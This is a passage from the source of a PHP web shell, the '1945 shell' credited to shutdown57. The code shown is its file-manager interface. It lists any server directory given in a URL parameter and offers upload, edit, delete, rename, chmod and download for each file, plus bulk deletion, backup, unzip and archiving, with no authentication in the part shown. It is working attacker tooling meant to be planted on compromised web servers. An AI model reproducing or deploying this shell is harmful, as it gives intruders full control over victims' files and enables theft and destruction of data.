1481unset($_SESSION['responsive']);
1482echo"<script>
1483alert('mode responsive :OFF');
1484window.location.href='?responsive=off';
1485</script>";
1486
1487}elseif($_GET['theme']){
1488 ?>
1489 <br><br>
1490 <center>
1491 <h1>.:: change theme and become more comfortable ::.</h1>
1492 <small>c0ded by shutdown57</small>
1493
1494 <br><br>
1495 <table class="tbl_exp" border=1><thead id="thead">
1496 <th>FONT SIZE</th><th>FONT COLOR</th><th>PUBLIC FONT COLOR</th><th>BACKGROUND</th><th>REPONSIVE MODE</th></thead>
1497 <tbody>
1498 <tr><td>
1499 <form method="post">
1500 <input type="number" name="fz" value="<?=$fz;?>"><input type="submit" name="submitfz" value=">>"></form></td><td>
1501 <form method="post">
1502<input type="color" name="color" value="<?=$col;?>"><input type="submit" name="submitcol" value=">>"></form></td><td>
1503<form method="post">
1504<input type="color" name="pcolor" value="<?=$pcol;?>"><input type="submit" name="submitpc" value=">>"></form></td><td>
1505<form method="post">
1506<input type="color" name="bgcolor" value="<?=$bg;?>"><input type="text" value="<?=$bg;?>" name="bgcolor"><input type="submit" name="submitbg" value=">>"></form></td><td><?php echo $resmod;?></td></tr></tbody></table>
1507<h3>[<a href='?act=<?=$d;?>&reset=<?=$d;?>'>DEFAULT THEMES</a>]</h3>
1508</center>
1509<pre>
1510
1511FONT SIZE : mengubah ukuran font(tulisan) ,semakin besar angka semakin besar pula ukuran font.
1512FONT COLOR : mengubah warna font (bukan link).
1513PUBLIC FONT COLOR : mengubah semua warna font(termasuk link).
1514BACKGROUND : mengubah warna background atau bisa dengan gambar di isi dengan :
1515 ex : url('http://google.com/gambar.jpg')
1516REPONSIVE MODE : mode saat menyesuaikan ukuran layar pengguna.
1517
1518</pre>
1519<?php
1520}elseif($_GET['reset']){
1521unset($_SESSION['fz']);
1522unset($_SESSION['col']);
1523unset($_SESSION['pcol']);
1524unset($_SESSION['bg']);
1525echo "<script>window.location.href='?'</script>";
1526}elseif (isset($_GET['replace'])) {
1527 echo"
1528 <center>
1529 <h3>: auto replace string :</h3>
1530 <P>NB : gunakan otak kalian ! </p>
1531 <br>
1532 <form method='post'>
1533 <input type='submit' name='sstr' value='replace all'>
1534 <table style='border-collapse:collapse;border:1px solid #eee;' border=1><tr><td>
1535 <textarea name='str' style='width:600px;height:200px;' required>Your string here / string anda sini</textarea></td><td>
1536 <textarea name='str2' style='width:600px;height:200px;' required>string will u replace / string yang ingin anda ganti</textarea></td></tr>
1537 <tr><td>
1538 <textarea name='str3' style='width:600px;height:200px;' required>string replace /ganti string</textarea></td><td>
1539 <form>";
1540 if(isset($_POST['sstr'])){
1541 $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
1542 if($rep){
1543 echo'
1544 <textarea style="width:600px;height:200px;">'.$rep.'</textarea></td></tr></table>';
1545 }
1546 }
1547}
1548}else{
1549 ?>
1550<table class="tbl_exp" border='1'>
1551<tr id="thead">
1552<th>No</th><th>^</th><th>Name</th><th>Permission</th><th>Size</th><th>Last Modified</th><th>action</th>
1553</tr>
1554
1555<?php
1556if(isset($_GET['45'])){
1557$d=$_GET['45'];
1558}else{
1559$d=getcwd();
1560}
1561$d=str_replace('\\','/',$d);
1562$sdir=scandir($d);
1563$no=1;
1564echo'
1565<form method="post">
1566<tr class="hover">
1567
1568 <td style="width:25px;max-width:48px;">-</td><td style="width:20px">^</td><td style="width:20%;max-width:500px;">
1569 <--[<a href="?45='.dirname($d).'">..</a>]</td><td>--</td><td>--</td><td>--</td><td>[<a href="?act='.$d.'&upload='.$d.'/'.$dir.'">upload</a>][<a href="?act='.$d.'&mkdir='.$d.'/'.$dir.'">newdir</a>][<a href="?act='.$d.'&newfile='.$d.'/'.$dir.'">newfile</a>]</td></tr>';
1570foreach ($sdir as $dir) {
1571 if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue;
1572 echo'
1573
1574 <tr class="hover">
1575 <td>'.$no++.'</td><td>
1576<input type="checkbox" name="cekd[]" value="'.$d.'/'.$dir.'" style="background:transparent;color: #fff;border: 1px solid #fff;">
1577</td>
1578 <td style="width:20%;max-width:500px;">'.icon_folder.'
1579 [<a href="?45='.$d.'/'.$dir.'">'.substr($dir,0,40).'</a>]</td>
1580 <td>'.perms("$d/$dir").'</td><td>DIR</td><td>'.date('d M Y | H:m',filemtime("$d/$dir")).'</td><td style="width:20%;max-width:400px;">
1581 [<a href="?act='.$d.'&rmdir='.$d.'/'.$dir.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$dir.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$dir.'">chmod</a>]</td></tr>';
1582}
1583foreach ($sdir as $file) {
1584 if(!is_file("$d/$file"))continue;
1585 $size = filesize("$d/$file")/1024;
1586$size = round($size,3);
1587if($size >= 1024){
1588$size = round($size/1024,2).' MB';
1589}else{
1590$size = $size.' KB';
1591}
1592 echo'
1593 <tr class="hover">
1594 <td>'.$no++.'</td><td><input type="checkbox" name="cekf[]" value="'.$d.'/'.$file.'"></td><td style="width:20%;max-width:500px;">'.icon_file.'
1595 -<a href="?act='.$d.'&src='.$d.'/'.$file.'">'.substr($file,0,40).'</a></td>
1596 <td>'.perms("$d/$file").'</td><td>'.$size.'</td><td>'.date('d M Y | H:m',filemtime("$d/$file")).'</td><td style="width:20%;max-width:400px;">
1597 [<a href="?act='.$d.'&edit='.$d.'/'.$file.'">edit</a>][<a href="?act='.$d.'&rm='.$d.'/'.$file.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$file.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$file.'">chmod</a>][<a href="?act='.$d.'&download='.$d.'/'.$file.'">Download</a>]</td></tr>';
1598}
1599
1600echo'
1601<tr>
1602<td colspan="3">
1603<select name="select">
1604<option> action selected files</option>
1605<option value="del">delete</option>
1606<option value="copy">backUp</option>
1607<option value="unzip">unzip</option>
1608<option value="gz">compress .gz</option>
1609<option value="tar"> compress .tar.gz </option>
1610</select>
1611<input type="submit" name="sbmt" value=">>" >
1612</form></td><td><form method="post">
1613font size : <input type="number" name="fz" value="'.$fz.'"><input type="submit" name="submitfz" value=">>"></form></td><td><form method="post">
1614background: <input type="color" name="bgcolor" value="'.$bg.'"><input type="submit" name="submitbg" value=">>"></form></td><td><form method="post">
1615font color: <input type="color" name="color" value="'.$col.'"><input type="submit" name="submitcol" value=">>"></form></td><td>responsive mode : '.$resmod.' </td></tr>
1616</table>';
1617
1618if(isset($_POST['sbmt'])){
1619 $file=$_POST['cekf'];
1620 $dir=$_POST['cekd'];
1621 if($_POST['select']=='del'){
1622 if($_POST['cekf']){
1623
1624 foreach ($file as $cekf) {
1625 if(unlink($cekf)){
1626 echo"<meta http-equiv='refresh' content=0;url=>";
1627 }
1628 }
1629 }
1630 if($_POST['cekd']){
1631
1632 foreach ($dir as $cekd) {
1633 if(rmdir($cekd)){
1634 echo"<meta http-equiv='refresh' content=0;url=>";
1635 }
1636 }}}elseif($_POST['select']=='copy'){
1637if($_POST['cekf']){
1638
1639 foreach ($file as $copy) {
1640 $copi=basename($copy);
1641 if(!file_exists("45backUp")){
1642 @mkdir('45backUp');
1643 }
1644 if(copy($copy,"45backUp/".basename($copy))){
1645 echo"[<font color=lime>OK</font>]--> <a href='?act=".dirname($copy)."/45backUp&src=".dirname($copy)."/45backUp/".basename($copy)."'> ".basename($copy)." </a><br>";
1646 }else{
1647 echo "[<font color=grey>FAIL</font>]--> 45backUp/".basename($Copy)."<br>";
1648 }
1649 }
1650}
1651}elseif ($_POST['select']=='unzip') {
1652 @mkdir("45extracted");
1653 foreach ($file as $unzip) {
1654 $zip = new ZipArchive;
1655$res = $zip->open($unzip);
1656
1657if ($res === TRUE) {
1658
1659$zip->extractTo("45extracted/");
1660
1661$zip->close();
1662 echo "[<font color=lime>OK</font>] extracted !<br>";
1663 } else {
1664
1665echo "[<font color=grey>FAIL</font>] feiled!";
1666 }
1667 }
1668}elseif($_POST['select']=='gz'){
1669 if($_POST['cekf']){
1670 if(!file_exists("45compressed")){
1671 @mkdir("45compressed");
1672 }
1673foreach($file as $gz){
1674$gzfile = "45compressed/".basename($gz).".gz";
1675$fp = gzopen($gzfile, 'w9');
1676if(gzwrite($fp, file_get_contents($gz))){
1677 echo"[<font color=lime> OK </font>] Compressed !!--> <a href='?45=".dirname($gz)."/45compressed'>here</a>";
1678}
1679gzclose($fp);
1680
1681}
1682}
1683}elseif ($_POST['select']=='tar') {
1684 try
1685{
1686 $a = new PharData('45archive.tar');
1687foreach($file as $tar){
1688 $a->addFile($tar);
1689}
1690 $a->compress(Phar::GZ);
1691 @unlink('45archive.tar');
1692}
1693catch (Exception $e)
1694{
1695 echo "Exception : " . $e;
1696}
1697}
1698}
1699}
1700function perms($file){
1701$perms = fileperms($file);
1702
1703if (($perms & 0xC000) == 0xC000) {
1704// Socket
1705$info = 's';
1706} elseif (($perms & 0xA000) == 0xA000) {
1707// Symbolic Link
1708$info = 'l';
1709} elseif (($perms & 0x8000) == 0x8000) {
1710// Regular
1711$info = '-';
1712} elseif (($perms & 0x6000) == 0x6000) {
1713// Block special
1714$info = 'b';
1715} elseif (($perms & 0x4000) == 0x4000) {
1716// Directory
1717$info = 'd';
1718} elseif (($perms & 0x2000) == 0x2000) {
1719// Character special
1720$info = 'c';
1721} elseif (($perms & 0x1000) == 0x1000) {
1722// FIFO pipe
1723$info = 'p';
1724} else {
1725// Unknown
1726$info = 'u';
1727}
1728
1729// Owner
1730$info .= (($perms & 0x0100) ? 'r' : '-');
1731$info .= (($perms & 0x0080) ? 'w' : '-');
1732$info .= (($perms & 0x0040) ?
1733(($perms & 0x0800) ? 's' : 'x' ) :
1734(($perms & 0x0800) ? 'S' : '-'));
1735
1736// Group
1737$info .= (($perms & 0x0020) ? 'r' : '-');
1738$info .= (($perms & 0x0010) ? 'w' : '-');
1739$info .= (($perms & 0x0008) ?
1740(($perms & 0x0400) ? 's' : 'x' ) :
1741(($perms & 0x0400) ? 'S' : '-'));
1742
1743// World
1744$info .= (($perms & 0x0004) ? 'r' : '-');
1745$info .= (($perms & 0x0002) ? 'w' : '-');
1746$info .= (($perms & 0x0001) ?
1747(($perms & 0x0200) ? 't' : 'x' ) :
1748(($perms & 0x0200) ? 'T' : '-'));
1749
1750return $info;
1751}
1752?>
1753<div style="font-size:11px;position:fixed;bottom:0;left:0;">
1754copyright © <?php echo date('Y');?> | 1945 shell by : shutdown57 | <a href="http://www.withoutshadow.org"> www.withoutshadow.org</a>
1755</div>
1756</body>
1757</html>